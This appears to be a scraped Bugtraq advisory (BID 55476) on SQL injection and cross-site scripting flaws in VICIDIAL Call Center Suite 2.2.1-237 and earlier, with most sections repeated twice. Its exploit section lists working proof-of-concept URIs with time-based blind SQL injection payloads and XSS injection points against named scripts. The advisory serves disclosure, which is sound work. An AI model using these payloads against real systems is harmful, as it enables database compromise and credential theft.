VICIDIAL Call Center Suite Multiple SQL Injection and Cross Site Scripting Vulnerabilities
BID:55476
Info
VICIDIAL Call Center Suite Multiple SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 55476 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 10 2012 12:00AM |
| Updated: | Sep 10 2012 12:00AM |
| Credit: | Sepahan TelCom IT Group |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
VICIDIAL Call Center Suite Multiple SQL Injection and Cross Site Scripting Vulnerabilities
VICIDIAL Call Center Suite is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VICIDIAL Call Center Suite 2.2.1-237 and prior are vulnerable.
VICIDIAL Call Center Suite is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VICIDIAL Call Center Suite 2.2.1-237 and prior are vulnerable.
Exploit / POC
VICIDIAL Call Center Suite Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Attackers can use a browser to exploit the SQL-injection issues. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issues.
The following example URIs are available:
http://www.example.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07
http://www.example.com/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4
http://www.example.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)='
http://www.example.com/admin_search_lead.php?alt_phone_search=&DB=1&first_name=lskkuuaj&last_name=lskkuuaj&lead_id=1&list_id=1&log_lead_id=1&log_phone=555-666-0606&phone=555-666-0606&status=1&submit=SUBMIT&user=[XSS]&vendor_id=1
http://www.example.com/user_stats.php?user=[XSS]
Attackers can use a browser to exploit the SQL-injection issues. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issues.
The following example URIs are available:
http://www.example.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07
http://www.example.com/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4
http://www.example.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)='
http://www.example.com/admin_search_lead.php?alt_phone_search=&DB=1&first_name=lskkuuaj&last_name=lskkuuaj&lead_id=1&list_id=1&log_lead_id=1&log_phone=555-666-0606&phone=555-666-0606&status=1&submit=SUBMIT&user=[XSS]&vendor_id=1
http://www.example.com/user_stats.php?user=[XSS]
Solution / Fix
VICIDIAL Call Center Suite Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
VICIDIAL Call Center Suite Multiple SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- VICIDIAL Call Center Suite Homepage (Vicidial Group)